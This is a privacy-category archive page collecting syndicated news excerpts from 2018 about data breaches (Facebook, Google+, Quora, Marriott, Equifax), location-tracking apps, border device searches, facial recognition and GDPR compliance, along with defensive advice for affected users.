Category Archives: Privacy

Porn Sites Collect More User Data Than Netflix Or Hulu

An anonymous reader quotes a report from Quartz: The biggest and perhaps best source of data about what people like to watch on the internet and what they would pay for doesn't come from streaming giants like Netflix, Amazon Prime Video, or Hulu. It comes from porn. While consuming porn is typically a private and personal affair, porn sites still track your every move: What content you choose, which moments you pause, which parts you repeat. By mining this data to a deeper degree than other streaming services, many porn sites are able to give internet users exactly what they want -- and they want a lot of it. [...] MindGeek is the world's biggest porn company -- more specifically, it's a holding company that owns numerous adult entertainment sites and production companies, including the Pornhub Network. Like other streaming giants, MindGeek's sites analyze user data, but the company has an edge when it comes to producing tailor-made content in-house. With at least 125 million daily visits, MindGeek has a massive range of users to draw data from and create content for. The average user can watch as much porn as they'd like without so much as making an account, let alone paying, but in exchange for meeting desires that can't always be met elsewhere, companies like MindGeek access user data because the user more willingly lets them. And it eventually pays off, when users decide to pay for premium content and the habits of paying subscribers become even clearer. What's more, Pornhub, in particular, operates one of the most sophisticated digital data analysis operations that caters primarily to users and not advertisers. Pornhub Insights provides transparency into its data collection -- on the most intimate of subjects -- by making research and analysis from billions of data points about viewership patterns, often tied to events from politics to pop culture, available to the public. It offers more than many other tech giants do.

Read more of this story at Slashdot.

Facebook bug exposed private photos of 6.8M users to third-party developers

By Waqas

Another day, another privacy breach – This time, the social media giant Facebook has announced that a bug in its Photo API exposed private photos of over 6.8 million users to third-party app developers. The breach took place from September 13 to September 25, 2018, which means for 12 days straight some developers could view your […]

This is a post from HackRead.com Read the original post: Facebook bug exposed private photos of 6.8M users to third-party developers

A bug in Facebook Photo API exposed photos of 6.8 Million users

New problems for Facebook, the social network giant announced that a bug related to Photo API could have allowed third-party apps to access users’ photos.

Facebook announced that photos of 6.8 Million users might have been exposed by a bug in the Photo API allowing third-party apps to access them.  
The bug impacted up over 870 developers, only apps granted access to photos by the user could have exploited the bug. 
According to Facebook, the flaw exposed user photos for 12 days, between September 13 and September 25, 2018.

The flaw was discovered by the Facebook internal team and impacted users who had utilized Facebook Login and allowed third-party apps to access their photos.

“Our internal team discovered a photo API bug that may have affected people who used Facebook Login and granted permission to third-party apps to access their photos. We have fixed the issue but, because of this bug, some third-party apps may have had access to a broader set of photos than usual for 12 days between September 13 to September 25, 2018.” reads a post published by Facebook.

Theoretically, applications that are granted access to photos could access only images shared on a user’s timeline. The bug could have exposed also other photos, including ones shared on Facebook Marketplace or via Stories, and even photos that were only uploaded but not posted.

“Currently, we believe this may have affected up to 6.8 million users and up to 1,500 apps built by 876 developers. The only apps affected by this bug were ones that Facebook approved to access the photos API and that individuals had authorized to access their photos.” continues the post.

Facebook is notifying impacted people via an alert in their account.

“We’re sorry this happened. Early next week we will be rolling out tools for app developers that will allow them to determine which people using their app might be impacted by this bug. We will be working with those developers to delete the photos from impacted users.” concludes Facebook.

“We will also notify the people potentially impacted by this bug via an alert on Facebook. The notification will direct them to a Help Center link where they’ll be able to see if they’ve used any apps that were affected by the bug.”

Pierluigi Paganini

(Security Affairs –Facebook, privacy)

The post A bug in Facebook Photo API exposed photos of 6.8 Million users appeared first on Security Affairs.

Personal & banking data of 120 million Brazilians leaked online

By Carolina

The Cadastro de Pessoas Físicas (CPFs) is a taxpayer registry identification for Brazilians – In this case, 120 million CPFs were exposed online. The IT security researchers at InfoArmor’s Advanced Threat Intelligence team discovered a treasure trove of personal sensitive data belonging to over 120 million Brazilians exposed on an unprotected AWS (Amazon Web Service) S3 cloud […]

This is a post from HackRead.com Read the original post: Personal & banking data of 120 million Brazilians leaked online

A Corporate-issued Laptop Stolen From a Lenovo Employee in September Contained Unencrypted Payroll Data on APAC Staff

A corporate-issued laptop lifted from a Lenovo employee in Singapore contained a cornucopia of unencrypted payroll data on staff based in the Asia Pacific region, news outlet The Register reports. From the report: Details of the massive screw-up reached us from Lenovo staffers, who are simply bewildered at the monumental mistake. Lenovo has sent letters of shame to its employees confessing the security snafu. "We are writing to notify you that Lenovo has learned that one of our Singapore employees recently had the work laptop stolen on 10 September 2018," the letter from Lenovo HR and IT Security, dated 21 November, stated. "Unfortunately, this laptop contained payroll information, including employee name, monthly salary amounts and bank account numbers for Asia Pacific employees and was not encrypted." Lenovo employs more than 54,000 staff worldwide, the bulk of whom are in China.

Read more of this story at Slashdot.

Smashing Security #108: Hoaxes, Huawei and chatbots – with Mikko Hyppönen

Smashing Security #108: Hoaxes, Huawei and chatbots - with Mikko Hyppönen

The curious case of George Duke-Cohan, Huawei’s CFO finds herself in hot water, and the crazy world of mobile phone mental health apps.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by special guests Mikko Hyppönen from F-Secure and technology journalist Geoff White.

SecurityWeek RSS Feed: Rhode Island Sues Alphabet Over Google+ Security Incidents

A government organization in Rhode Island announced on Wednesday that it has filed a lawsuit against Google’s parent company, Alphabet Inc., over the recent security incidents involving the Google+ social network.

read more



SecurityWeek RSS Feed

An critical bug in Microsoft left 400M accounts exposed

By Waqas

A bug bounty hunter from India, Sahad Nk who works forSafetyDetective, a cybersecurity firm, has received a reward from Microsoft for uncovering and reporting a series of critical vulnerabilities in Microsoft accounts. These vulnerabilities were present on users’ Microsoft accounts from MS Office files to Outlook emails. This means, all kinds of accounts (over 400 […]

This is a post from HackRead.com Read the original post: An critical bug in Microsoft left 400M accounts exposed

Border Agents Fail To Delete Personal Data of Travelers After Electronic Searches, Watchdog Says

The Department of Homeland Security's internal watchdog, known as the Office of the Inspector General (OIG) found that the majority of U.S. Customs and Border Protection (CBP) agents fail to delete the personal data they collect from travelers' devices. Last year alone, border agents searched through the electronic devices of more than 29,000 travelers coming into the country. "CBP officers sometimes upload personal data from those devices to Homeland Security servers by first transferring that data onto USB drives -- drives that are supposed to be deleted after every use," Gizmodo reports. From the report: Customs officials can conduct two kinds of electronic device searches at the border for anyone entering the country. The first is called a "basic" or "manual" search and involves the officer visually going through your phone, your computer or your tablet without transferring any data. The second is called an "advanced search" and allows the officer to transfer data from your device to DHS servers for inspection by running that data through its own software. Both searches are legal and don't require a warrant or even probable cause -- at least they don't according to DHS. It's that second kind of search, the "advanced" kind, where CBP has really been messing up and regularly leaving the personal data of travelers on USB drives. According to the new report [PDF]: "[The Office of the Inspector General] physically inspected thumb drives at five ports of entry. At three of the five ports, we found thumb drives that contained information copied from past advanced searches, meaning the information had not been deleted after the searches were completed. Based on our physical inspection, as well as the lack of a written policy, it appears [Office of Field Operations] has not universally implemented the requirement to delete copied information, increasing the risk of unauthorized disclosure of travelers' data should thumb drives be lost or stolen." The report also found that Customs officers "regularly failed to disconnect devices from the internet, potentially tainting any findings stored locally on the device." It also found that the officers had "inadequate supervision" to make sure they were following the rules. There's also a number of concerning redactions. For example, everything from what happens during an advanced search after someone crosses the border to the reason officials are allowed to conduct an advanced search at all has been redacted.

Read more of this story at Slashdot.

Apps on smartphones are selling and sharing our location data 24/7

By Waqas

It’s no surprise that the apps we download on our smartphones are tracking our movements and also transferring the information to third parties without our consent. Last year it was Google caught collecting location data of Android users even if their device’s location service was off then the Gay dating app Grindr, Facebook and the fitness app by […]

This is a post from HackRead.com Read the original post: Apps on smartphones are selling and sharing our location data 24/7

Data scraping treasure trove found in the wild

We bring word of yet more data exposure, in the form of “nonsensitive” data scraping to the tune of 66m records across 3 large databases. The information was apparently scraped from various sources and left to gather dust, for anyone lucky enough to stumble upon it.

What is data scraping?

The gathering of information from websites either by manual means, which isn’t time optimal, or by automated processes such as dedicated programs or bots. Often, this data scraping is for nefarious purposes and can be used for marketing or simply threatening behaviour. It also typically relies on the person being scraped to have provided much of the grabbable data upfront. It’s frowned upon, but it’s often unclear where things stand legally.

Scrape all the things

Three large databases were found by security researchers, containing a combined tally of 66,147,856 unique records. At least one instance was exposed due to a lack of authentication. The records are very business-centric, with one (for example) containing full name, email, listed location, employment history, and skills. This sounds very much like the information you see on a public facing Linkedin profile. Indeed, many people have said they received breach notifications to their Linkedin specific mail, and there’s some mention of Github too.

Elsewhere, some 22 million records were found on the second server. This related to job search aggregation data, and this included IP, name, email, and potential job locations. Number 3 sang to the tune of 48 million records, and also sounds like a generic business-centric dump. Name, phone, employer, and so on.

Is the threat serious?

The information collected isn’t exactly a red hot dump of personal information, but it’s certainly useful for phishing attempts. It could also prove useful to anyone wanting a ready made marketing list. The big problem is that even if the ones doing the data scraping had no harmful intentions, that may not apply to anybody finding the treasure trove.

Given how this information was stumbled upon in the first place, there’s no real way to know how many bad actors got their hands on it first.

How can I reduce the scraping risk?

Well, that’s a good question. Given that the data was (mostly) freely given online in terms of the Linkedin profile information, it’s all about personal choice. Take a look at your Linkedin right now. Are you happy with what’s on display? Have you hidden any of it? Perhaps it’s a good idea to remove older roles, or jobs of a sensitive nature. Maybe that phone number doesn’t need to be so prominent. How about location, does it have to be so precise? Or would a broader area suffice?

Unfortunately, many people don’t consider the information they place online to be harmful, until it suddenly is. By the time it’s been scraped, plundered, and jammed into a larger database, it’s already too late to do anything about it.

The only real solution is to control every last aspect of what you’re happy to place in front of everybody else, which for most people involves having to dredge up a list of sites and accounts then start stripping things out. That’s fine; it’s never too late to start pulling things offline that don’t need to be there.

Next steps for anyone affected?

Given the very prominent business angle to this one, it’d be wise to consider who may look to take advantage of it. Alongside the previously mentioned phishers, this is the kind of thing someone could use alongside the offer of fake jobs. If you want to become a money mule, this could definitely be the “perfect” lead in!

A common destination for business-centric grab bags such as this one are unremarkable job search sites. Be on the look out for a flood of poor quality job offer spam. Be especially wary if they come bearing gifts of paid membership, as nobody should pay someone grabbing your data free of charge then using it to spam them with nonsense.

Ah yes, spam.

Scraped email lists will inevitably be harvested, readjust quality filters if needed. The good news is, most email offerings do a pretty good job of keeping your mailbox clean.

Almost all of us will end up in a data dump at some point. Whether scraped or hacked, being cautious around strange phonecalls and peculiar emails will go a long way towards minimising any further potential harm.

The post Data scraping treasure trove found in the wild appeared first on Malwarebytes Labs.

Is 2019 Privacy Rights’ Break Out Year?

Whatever else it may bring, 2019 will be a breakout year for online privacy, as the EU’s GDPR takes root and legislation in other nations follow suit. But not everyone is on board with the new privacy regime. Who will be the privacy leaders and laggards in the New Year?

The post Is 2019 Privacy Rights’ Break Out Year? appeared first on ...

Read the whole entry... »

Related Stories

Google will shut down consumer version of Google+ earlier due to a bug

Google announced it will close the consumer version of Google+ before than originally planned due to the discovery of a new security flaw.

Google will close the consumer version of Google+ in April, four months earlier than planned. According to G Suite product management vice president David Thacker. the company will maintain only a version designed for businesses. Google will shut down the Application programming interface programs (APIs) used by developers to access Google+ data within 90 days, due to the discovery of a bug.

“We’ve recently determined that some users were impacted by a software update introduced in November that contained a bug affecting a Google+ API.” wrote David Thacker.

“We discovered this bug as part of our standard and ongoing testing procedures and fixed it within a week of it being introduced. No third party compromised our systems, and we have no evidence that the app developers that inadvertently had this access for six days were aware of it or misused it in any way.”

The new flaw was introduced with a software update in November and it was discovered during routine testing and quickly fixed by the experts of the company.

Thacker pointed out that the protection of Google users is a priority for the firm and for this reason all Google+ APIs will be shut-down soon.

“With the discovery of this new bug, we have decided to expedite the shut-down of all Google+ APIs,” Thacker said.

“While we recognize there are implications for developers, we want to ensure the protection of our users.”

social network Google+

According to Google, the vulnerability affected approximately 52.5 million users, allowing applications to see profile information such as name, occupation, age, and email address even if access was set to private.

Google initially announced plans to shut down Google+ after discovered 
a bug that exposed private data in as many as 500,000 accounts

At the time, there was no evidence that developers had taken advantage of the flaw.

Google is in the process of notifying any enterprise customers that were impacted by this flaw.

“A list of impacted users in those domains is being sent to system administrators, and we will reach out again if any additional impacted users or issues are discovered.” concludes Thacker. 

Pierluigi Paganini

(Security Affairs –Google+, social network)

The post Google will shut down consumer version of Google+ earlier due to a bug appeared first on Security Affairs.

Data protection impact assessments for health research: what’s changed under GDPR?

Since GDPR came into effect on 25 May this year, the health regulations have been updated to incorporate more stringent requirements around protecting personal information during healthcare research. The newly updated Health Research Regulations 2018 have raised the bar for carrying out a data protection impact assessment (DPIA). This post is the first in a series I’ll be writing about GDPR, privacy and health data.

We all know privacy by design is a cornerstone of the General Data Protection Regulation. The first building block to that foundation is carrying out a DPIA (commonly referred to as a privacy impact assessment). In November, the Data Protection Commissioner published guidance for data controllers and processors whose business activities may require them to carry out a DPIA. It is available as a free PDF here

More specifically for the health sector, the Health Research Regulations 2018 make it mandatory to perform a DPIA in all cases that involve processing personal data for research purposes. They remove all risk to the data subject – and that is a good thing.

The revised rules apply to a wide variety of stakeholders, including research bodies, pharmaceutical companies, academic institutions, higher education institutes, and other research-related bodies such as those attached to hospitals. Equally, technology companies may carry out research involving health information and they too need to comply with this requirement.

The Health Research Board has published guidance for researchers to reflect the new data protection landscape. Broadly speaking, they compel researchers to take suitable and specific measures to safeguard the fundamental rights and freedoms of data subjects.

This essentially breaks down into two key questions researchers need to ask ahead of any impact assessment exercise:

Is there a risk to the rights and freedoms of the data subject?

Consider this keeping in mind the data subject rights under GDPR, which includes the right to access, rectification, objection, and portability. The Data Protection Commissioner has published a free report which describes these rights.

Have you mitigated those risks?

Do you have policies in place, and are they published online in a transparent way? Have you done a data mapping or data inventory exercise? Do you have an appropriate legal basis for processing information? Are you archiving information in line with retention schedules? Do you have a process in place for a subject access request?

By definition, a DPIA involves assessing the impact of risks to the data subject, and to their rights and freedoms. The nature of research means you don’t know beforehand what the outcome will be. You may discover during the exploration process that there is the potential to use the same information for a different purpose.

The Health Research Regulations 2018 will lead to many, many more DPIAs in the future. Research groups are likely to need external assistance to carry them out. To get ready for this new level of compliance, it is worth familiarising themselves with the DPIA process.

At BH Consulting, we have developed a privacy impact assessment template which guides our clients in identifying the risks associated with data processing. Get in touch to find out how we can help.

Tracy Elliott is a senior data protection consultant with BH Consulting. Check back over the coming weeks for more posts about data protection and health research.

 

The post Data protection impact assessments for health research: what’s changed under GDPR? appeared first on BH Consulting.

House Panel Issues Scathing Report On ‘Entirely Preventable’ Equifax Data Breach

An anonymous reader quotes a report from The Hill: The Equifax data breach, one of the largest in U.S. history, was "entirely preventable," according to a new House committee investigation. The House Oversight and Government Reform Committee, following a 14-month probe, released a scathing report Monday saying the consumer credit reporting agency aggressively collected data on millions of consumers and businesses while failing to take key steps to secure such information. "In 2005, former Equifax Chief Executive Officer (CEO) Richard Smith embarked on an aggressive growth strategy, leading to the acquisition of multiple companies, information technology (IT) systems, and data," according to the 96-page report authored by Republicans. "Equifax, however, failed to implement an adequate security program to protect this sensitive data. As a result, Equifax allowed one of the largest data breaches in U.S. history. Such a breach was entirely preventable." The report blames the breach on a series of failures on the part of the company, including a culture of complacency, the lack of a clear IT management operations structure, outdated technology systems and a lack of preparedness to support affected consumers. "A culture of cybersecurity complacency at Equifax led to the successful exfiltration of the personal information of approximately 148 million individuals," the committee staff wrote. "Equifax's failure to patch a known critical vulnerability left its systems at risk for 145 days. The company's failure to implement basic security protocols, including file integrity monitoring and network segmentation, allowed the attackers to access and remove large amounts of data." The Oversight staff found that the company not only lacked a clear management structure within its IT operations, which hindered it from addressing security matters in a timely manner, but it also was unprepared to identify and notify consumers affected by the breach. The report said the company could have detected the activity but did not have "file integrity monitoring enabled" on this system, known as ACIS, at the time of the attack.

Read more of this story at Slashdot.

Google Plus hit by another breach – Data of 52.5M users exposed

By Waqas

Google Plus has been hit by yet another bug forcing the company to shut down the social media site earlier than previously anticipated. In October this year, Google revealed that a bug was present in the API for the consumer version of Google Plus (Google+) that allowed third-party developers to access data of not just over 500,000 users but also […]

This is a post from HackRead.com Read the original post: Google Plus hit by another breach – Data of 52.5M users exposed

SecurityWeek RSS Feed: Tor Project Releases Financial Documents

The Tor Project, the organization behind the Tor anonymity network, has published financial documents for the past two years, and while they show that its revenue has increased significantly, it’s still small compared to the budgets of potential adversaries.

read more



SecurityWeek RSS Feed

Your Apps Know Where You Were Last Night, and They’re Not Keeping It Secret

Dozens of companies use smartphone locations to help advertisers and even hedge funds. They say it's anonymous, but the data shows how personal it is. From a report: The millions of dots on the map trace highways, side streets and bike trails -- each one following the path of an anonymous cellphone user. One path tracks someone from a home outside Newark to a nearby Planned Parenthood, remaining there for more than an hour. Another represents a person who travels with the mayor of New York during the day and returns to Long Island at night. [...] An app on the device gathered her location information, which was then sold without her knowledge. It recorded her whereabouts as often as every two seconds, according to a database of more than a million phones in the New York area that was reviewed by The New York Times. At least 75 companies receive anonymous, precise location data from apps whose users enable location services to get local news and weather or other information, The Times found. Several of those businesses claim to track up to 200 million mobile devices in the United States -- about half those in use last year. The database reviewed by The Times -- a sample of information gathered in 2017 and held by one company -- reveals people's travels in startling detail, accurate to within a few yards and in some cases updated more than 14,000 times a day.

Read more of this story at Slashdot.

Consumers still put trust in big brands despite breaches

Janrain conducted a survey to better understand how consumers really feel about brands in the wake of so many breaches. The company polled 1,000 UK adults and found that most consumers are still willing to part with their personal information if it can somehow benefit them. While big internet companies like Google and Facebook remain among the least trusted businesses, a large number of respondents put the most faith in pharmaceutical and travel companies including … More

The post Consumers still put trust in big brands despite breaches appeared first on Help Net Security.

Not all data collection is evil: Don’t let privacy scandals stall cybersecurity

Facebook continues to be criticized for its data collection practices. The media is hammering Google over how it handles data. JPMorgan Chase & Company was vilified for using Palantir software to allegedly invade the privacy of employees. This past June marked the five-year anniversary of The Guardian’s first story about NSA mass surveillance operations. These incidents and many others have led to an era where the world is more heavily focused on privacy and trust. … More

The post Not all data collection is evil: Don’t let privacy scandals stall cybersecurity appeared first on Help Net Security.

DuckDuckGo study claims Google Incognito searches are not private

By Waqas

Google offers customized search results even in Incognito Mode, study. DuckDuckGo claims that Google’s search results aren’t just based on your location data and previous searches normally but also when you are logged out or browsing in incognito mode. It’s a fact that offering personalized and customized search results have been a hallmark of Google. […]

This is a post from HackRead.com Read the original post: DuckDuckGo study claims Google Incognito searches are not private

Facial Recognition Has To Be Regulated To Protect the Public, Says AI Report

A new report (PDF) from the AINow Institute calls for the U.S. government to take general steps to improve the regulation of facial recognition technology amid much debate over the privacy implications. "The implementation of AI systems is expanding rapidly, without adequate governance, oversight, or accountability regimes," it says. The report suggests, for instance, extending the power of existing government bodies in order to regulate AI issues, including use of facial recognition: "Domains like health, education, criminal justice, and welfare all have their own histories, regulatory frameworks, and hazards." MIT Technology Review reports: It also calls for stronger consumer protections against misleading claims regarding AI; urges companies to waive trade-secret claims when the accountability of AI systems is at stake (when algorithms are being used to make critical decisions, for example); and asks that they govern themselves more responsibly when it comes to the use of AI. And the document suggests that the public should be warned when facial-recognition systems are being used to track them, and that they should have the right to reject the use of such technology. The report also warns about the use of emotion tracking in face-scanning and voice detection systems. Tracking emotion this way is relatively unproven, yet it is being used in potentially discriminatory ways -- for example, to track the attention of students. "It's time to regulate facial recognition and affect recognition," says Kate Crawford, cofounder of AINow and one of the lead authors of the report. "Claiming to 'see' into people's interior states is neither scientific nor ethical."

Read more of this story at Slashdot.

NBlog Dec 7 – who owns the silos?


Michael Rasmussen has published an interesting, thought-provoking piece about the common ground linking specialist areas such as risk, security and compliance, breaking down the silos.

“Achieving operational resiliency requires a connected view of risk to see the big picture of how risk interconnects and impacts the organization and its processes. A key aspect of this is the close relationship between operational risk management (ORM) and business continuity management (BCM). It baffles me how these two functions operate independently in most organizations when they have so much synergy.”

While Michael’s perspective makes sense, connecting, integrating or simply seeking alignment between diverse specialist functions is, let's say, challenging. Nevertheless, I personally would much rather collaborate with colleagues across the organization to find and jointly achieve shared goals that benefit the business than perpetuate today's blinkered silos and turf wars. At the very least, I'd like to understand what drives and constrains, inspires and concerns the rest of the organization, outside my little silo.

Once you start looking, there are lots of overlaps, common ground, points of mutual interest and concern. Here are a few illustrative examples:
  • Information risk, information security, information technology: the link is glaringly obvious, and yet usually the second words are emphasized leaving the first woefully neglected;
  • Risk and reward, challenge and opportunity: these are flip sides of the same coin that all parts of the business should appreciate. Management is all about both minimizing the former and maximizing the latter. Business is not a zero-sum game: it is meant to achieve objectives, typically profit and other forms of successful outcomes. And yes, that includes information security!
  • Business continuity involves achieving resilience for critical business functions, activities, systems, information flows, supplies, services etc., often by mitigating risks through suitable controls. The overlap between BCM, [information] risk management and [information] security is substantial, starting with the underlying issue of what 'critical' actually means to the organization;
  • Human Resources, Training, Health and Safety and Information Risk and Security are all concerned with people, as indeed is Management. People are tricky to direct and control. People have their own internal drivers and constraints, their biases and prejudices, aims and objectives. Taming the people without destroying the sparks of creativity and innovation that set us apart from the robots is a common challenge ... and, before long, taming those robots will be the next common challenge.

Dig deeper still and you'll also find points of mutual disinterest and conflicts within the organization. Marketing, for instance, yearns to obtain and exploit all the information it can possibly obtain on prospective customers, causing sleepless nights for the Privacy Officer. Operations find it convenient or necessary to use shared accounts on shop-floor IT systems in the interest of speed, efficiency, safety etc. whereas Information Risk and Security point out that they are prohibited under corporate-wide security policies for accountability and control reasons.

You could view the organization as a multi-dimensional framework of interconnections and tensions between its constituent parts, all heading towards roughly the same goal/s (hopefully!) but on occasions pulling any which way at different speeds to get there. To make matters still more complex, the web of influence extends beyond the organization through its proximal contacts to The World At Large. That takes us into the realm of chaos theory, global politics and sociology. 'Nuff said.

All the organization's activities fall under the umbrella of corporate governance, senior managers clarifying the organization's grand objectives and optimizing the organization's overall performance by  establishing and monitoring the corporate structures, hierarchies, strategies, policies and other directives, information flows, relationships, systems, management arrangements etc. necessary to achieve them. Driving alignment and reducing conflicts is part of the governance art. Silos are governance failures.

Measuring privacy operations: Use of technology on the rise

Critical privacy program activities such as creating data inventories, conducting data protection impact assessments (DPIA), and managing data subject access rights requests (DSAR) are now well established in large and small organizations in both Europe and the United States, according to TrustArc and the International Association of Privacy Professionals (IAPP). “Among our thousands of members, we know that privacy teams are now reporting on a regular basis to company leadership, and consequently they need to … More

The post Measuring privacy operations: Use of technology on the rise appeared first on Help Net Security.

Consumers believe social media sites pose greatest risk to data

A majority of consumers are willing to walk away from businesses entirely if they suffer a data breach, with retailers most at risk, according to Gemalto. Two-thirds (66%) are unlikely to shop or do business with an organisation that experiences a breach where their financial and sensitive information is stolen. Retailers (62%), banks (59%), and social media sites (58%) are the most at risk of suffering consequences with consumers prepared to use their feet. Surveying … More

The post Consumers believe social media sites pose greatest risk to data appeared first on Help Net Security.

Smashing Security #107: Sextorting the US army, and a Touch ID scam

Smashing Security #107: Sextorting the US army, and a Touch ID scam

Fitness apps exploit TouchID through a sneaky user interface trick, tech giants claim to have a plan to banish passwords, and you won’t believe who was behind a sextortion scam that targeted over 400 members of the US military.

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by ferret-loving ethical hacker Zoë Rose.

Researchers: GDPR Already Having Positive Effect on Cybersecurity in EU

The General Data Privacy Regulation (GDPR) seems to already be having a positive effect on the state of cybersecurity in Europe less than seven months after it was enacted, showing that policy indeed can have a direct effect on organizations' security practices, security researchers said.

The post Researchers: GDPR Already Having Positive Effect...

Read the whole entry... »

Related Stories

Breaches, breaches everywhere, it must be the season

After last weeks shocker from Marriott this week started off with disclosures about breaches at Quora, Dunkin’ Donuts, and 1-800-Flowers.

Quora

Quora is an online community that focuses on asking and answering questions. It was founded in 2009 by two former Facebook employees.

The stolen data may concern up to 100 million users of the platform and included the username, the email address, and the encrypted password. In some cases, imported data from other social networks and private messages on the platform may have been taken as well.

To counter future abuse of the login credentials we would advise Quora users to change their password and make sure that the combination of credentials they used on Quora aren’t used elsewhere. Even though Quora used encryption and salted the passwords, it is not prudent to assume nobody will be able to decrypt them. For those that are in the habit of re-using passwords across different sites, please read: Why you don’t need 27 different passwords.

For those who no longer want to be registered at Quora, we also advise you to check under Settings and Disconnect any and all Connected Accounts.

Quora’s official statement can be checked for further details and updates.

Dunkin’ Donuts

A threat-actor successfully managed to gain access to Dunkin’ Donuts Perks accounts. The Perks accounts is a run-of-the-mill loyalty reward system. Dunkin’ Donuts claims that there was no breach into their systems but that re-used passwords were to blame.

we’ve been informed that third parties obtained usernames and passwords through other companies’ security breaches and used this information to log into some Dunkin’ DD Perks accounts.

As a countermeasure they forced password resets for all the customers the company believes were affected. If you are one of these customers the threat actors could have learned your first and last names, email addresses, 16-digit DD Perks account numbers, and DD Perks QR codes.

I repeat myself: For those that are in the habit of re-using passwords across different sites, please read: Why you don’t need 27 different passwords.

1-800-flowers

The Canadian online outpost of the floral and gourmet foods gift retailer reported an incident where a threat-actor may have gained access to customer data from 75,000 Canadian orders, including names and credit card information, over a four-year period. Even though the breach did not impact any customers on its U.S. website, 1-800-Flowers.com, the company has filed a notice with the attorney general’s office in California.

The stolen payment information seems to include credit card numbers and all the related information: names, expiration dates, and security codes. That’s really all any seasoned criminal needs to plunder your account.

Are you afraid to be a victim of this breach, here’s what you can do to prevent further damage:

  • Review your banking and credit card accounts for suspicious activity.
  • Consider a credit freeze if you’re concerned your financial information was compromised.
  • Watch out for breach-related scams; cybercriminals know this is a massive, newsworthy breach so they will pounce at the chance to ensnare users through social engineering

Or download our Data Breach Checklist here.

data breach epidemic

Is it the season?

Some of the recent breaches happened quite some time ago or have been ongoing for years, so why are they all telling us now?

Possible reasons:

  • New legislation requires companies to report breaches
  • Breaches happen all the time, but these happen to be some very serious or big ones, so the media talks about them
  • When a big breach is aired you will always see a few smaller ones, trying to hide in their shadow

If you’re a business looking for tips to prevent getting hit by a breach:

  • Invest in an endpoint protection product and data loss prevention program to make sure alerts on similar attacks get to your security staff as quickly as possible.
  • Take a hard look at your asset management program:
    • Do you have 100 percent accounting of all of your external facing assets?
    • Do you have uniform user profiles across your business for all use cases?
  • When it comes to lateral movement after an initial breach, you can’t catch what you can’t see. The first step to a better security posture is to know what you have to work with.

In a world where it seems breaches cannot be contained, consumers and businesses once again have to contend with the aftermath. Our advice to organizations: Don’t become a cautionary tale. Save your customers hassle and save your business’ reputation by taking proactive steps to secure your company today.

The post Breaches, breaches everywhere, it must be the season appeared first on Malwarebytes Labs.

House GOP Campaign Arm Targeted by ‘Unknown Entity’ in 2018

Thousands of emails were stolen from aides to the National Republican Congressional Committee during the 2018 midterm campaign, a major breach exposing vulnerabilities that have kept cybersecurity experts on edge since the 2016 presidential race.

read more

The Secret Service Wants To Test Facial Recognition Around the White House

The Secret Service is planning to test facial recognition surveillance around the White House, "with the goal of identifying 'subjects of interest' who might pose a threat to the president," reports The Verge. The document with the plans was published by the American Civil Liberties Union, describing "a test that would compare closed circuit video footage of public White House spaces against a database of images -- in this case, featuring employees who volunteered to be tracked." From the report: The test was scheduled to begin on November 19th and to end on August 30th, 2019. While it's running, film footage with a facial match will be saved, then confirmed by human evaluators and eventually deleted. The document acknowledges that running facial recognition technology on unaware visitors could be invasive, but it notes that the White House complex is already a "highly monitored area" and people can choose to avoid visiting. We don't know whether the test is actually in operation, however. "For operational security purposes we do not comment on the means and methods of how we conduct our protective operations," a spokesperson told The Verge. The ACLU says that the current test seems appropriately narrow, but that it "crosses an important line by opening the door to the mass, suspicionless scrutiny of Americans on public sidewalks" -- like the road outside the White House. (The program's technology is supposed to analyze faces up to 20 yards from the camera.) "Face recognition is one of the most dangerous biometrics from a privacy standpoint because it can so easily be expanded and abused -- including by being deployed on a mass scale without people's knowledge or permission."

Read more of this story at Slashdot.

Quora hacked: Personal data of 100 million users stolen

By Waqas

Quora hacked – Change your password now. Another day, another data breach – This time Quora, a question-and-answer website, has suffered a massive data breach in which personal data of 100 million registered users has been stolen, the company said on Tuesday, December 4th. In a blog post, Quora’s Chief Executive Adam D’Angelo explained that the […]

This is a post from HackRead.com Read the original post: Quora hacked: Personal data of 100 million users stolen

Marriott’s Breach Response Is So Bad, Security Experts Are Filling In the Gaps

An anonymous reader quotes a report from TechCrunch: Last Friday, Marriott sent out millions of emails warning of a massive data breach -- some 500 million guest reservations had been stolen from its Starwood database. One problem: the email sender's domain didn't look like it came from Marriott at all. Marriott sent its notification email from "email-marriott.com," which is registered to a third party firm, CSC, on behalf of the hotel chain giant. But there was little else to suggest the email was at all legitimate -- the domain doesn't load or have an identifying HTTPS certificate. In fact, there's no easy way to check that the domain is real, except a buried note on Marriott's data breach notification site that confirms the domain as legitimate. But what makes matters worse is that the email is easily spoofable. Many others have sounded the alarm on Marriott's lackluster data breach response. Security expert Troy Hunt, who founded data breach notification site Have I Been Pwned, posted a long tweet thread on the hotel chain giant's use of the problematic domain. As it happens, the domain dates back at least to the start of this year when Marriott used the domain to ask its users to update their passwords. Williams isn't the only one who's resorted to defending Marriott customers from cybercriminals. Nick Carr, who works at security giant FireEye, registered the similarly named "email-mariott.com" on the day of the Marriott breach. "Please watch where you click," he wrote on the site. "Hopefully this is one less site used to confuse victims." Had Marriott just sent the email from its own domain, it wouldn't be an issue.

Read more of this story at Slashdot.

Private data of more than 82 million US citizens left exposed

By Uzair Amir

Misconfigured ElasticSearch Servers Exposed Private Data of over 82 Million Users. A warning has been issued by Bob Diachenko, a HackenProof security researcher informing users in the US that around 73 gigabytes of data is identified in a “regular security audit” of publicly accessible servers on the Shodan IoT search engine. According to the researcher, […]

This is a post from HackRead.com Read the original post: Private data of more than 82 million US citizens left exposed

Experts found data belonging to 82 Million US Users exposed on unprotected Elasticsearch Instances

Security experts at HackenProof are warning Open Elasticsearch instances expose over 82 million users in the United States.

Experts from HackenProof discovered Open Elasticsearch instances that expose over 82 million users in the United States.

Elasticsearch is a Java-based search engine based on the free and open-source information retrieval software library Lucene. It is developed in Java and is released as open source, it is used by many organizations worldwide.

Experts discovered 73 gigabytes of data during a regular security audit of publicly available servers. Using the Shodan search engine the experts discovered three IPs associated with misconfigured Elasticsearch clusters.

“A massive 73 GB data breach was discovered during a regular security audit of publicly available servers with the Shodan search engine.” reads a blog post published by HackenProof.

“Prior to this publication, there were at least 3 IPs with the identical Elasticsearch clusters misconfigured for public access.”

